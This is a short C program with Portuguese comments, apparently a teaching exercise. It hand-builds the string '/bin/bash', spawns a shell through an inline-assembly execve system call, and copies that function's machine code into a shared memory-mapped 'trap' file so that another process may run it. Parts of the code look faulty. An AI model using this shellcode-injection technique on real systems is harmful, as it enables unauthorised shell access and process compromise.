/*
 * Exemplo de arquivo mapeado em memória.
 * Cria uma armadilha para outro processo...
 */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#include <sys/mman.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

#define SCRATCH "armadilha"

void f() {
  char args[14];
  args[0] = '/';
  args[1] = 'b';
  args[2] = 'i';
  args[3] = 'n';
  args[4] = '/';
  args[5] = 'b';
  args[6] = 'a';
  args[7] = 's';
  args[8] = 'h';
  args[9] = args[9] ^ args[9]; /* NULL */
  args[10] = args[9];
  args[11] = args[9];
  args[12] = args[9];
  args[13] = args[9];
  /* SYS_EXECVE */
  __asm__("movl $11, %eax        \n\ 
           leal -14(%ebp),%ebx     \n\
           leal -4(%ebp),%ecx   \n\
           xor %edx, %edx        \n\
           int $0x80");
}

int main() {
  int fd;
  char* map;
  struct stat buf;

  if ((fd = open(SCRATCH, O_RDWR, 0744)) == -1) {
    perror("open");
    return 0;
  }

  stat(SCRATCH, &buf);

  if ((map = mmap (main, buf.st_size, PROT_WRITE | PROT_READ,
		   MAP_SHARED, fd, 0)) == (void*) -1) {
    perror("mmap");
    exit(-1);
  }

  char *c = (char*) f;
  int i;
  for (i = 0; i < 100; i++)
    map[i] = c[i];

  void (*funcao)();
  funcao = map;
  f();
  munmap(map, buf.st_size);

  close(fd);
  
  return 0;

}